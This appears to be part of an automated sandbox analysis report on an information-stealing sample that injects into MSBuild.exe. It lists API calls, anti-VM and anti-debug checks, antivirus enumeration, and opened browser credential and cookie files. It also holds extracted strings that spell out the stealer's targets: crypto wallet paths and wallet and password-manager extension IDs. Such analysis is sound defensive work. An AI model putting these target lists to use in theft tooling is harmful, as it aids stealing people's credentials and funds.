                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040B030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004011E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,DeleteFileA,FindNextFileA,FindClose,1_2_004164A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00417550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040A530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00416CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00417140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040A980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_004168E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410540 GetSystemInfo,wsprintfA,1_2_00410540
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_1-91144
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_1-90063
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041A68F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041A68F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004185A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,1_2_00411020
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041F768 SetUnhandledExceptionFilter,1_2_0041F768
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041BBB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041BBB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAEB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6CAEB66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAEB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CAEB1F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CC9AC62
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411BD0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00411BD0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCE4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,1_2_6CCE4760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401000 cpuid 1_2_00401000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00410370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,LocalFree,1_2_004103E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004102A0 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,1_2_004102A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410220 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_00410220
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410300 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_00410300
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iles%\Windows Defender\MsMpeng.exe
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.45d3258.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.43f3218.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5960000.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.45d3258.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5960000.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4853278.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4493238.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.43f3218.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4493238.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4853278.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1758894906.0000000005960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe PID: 6308, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4076, type: MEMORYSTR
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|BinanceChainWallet|1|fhbohimaelbohpjbbldcngcnapndodjp|1|1|0|Yoroi|1|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase|1|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|1|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|1|iWallet|1|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|RoninWallet|1|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|1|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CloverWallet|1|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|LiqualityWallet|1|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra_Station|1|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|1|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth 
Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wal
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0dus\exodus.wallet\\seed.secoS
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
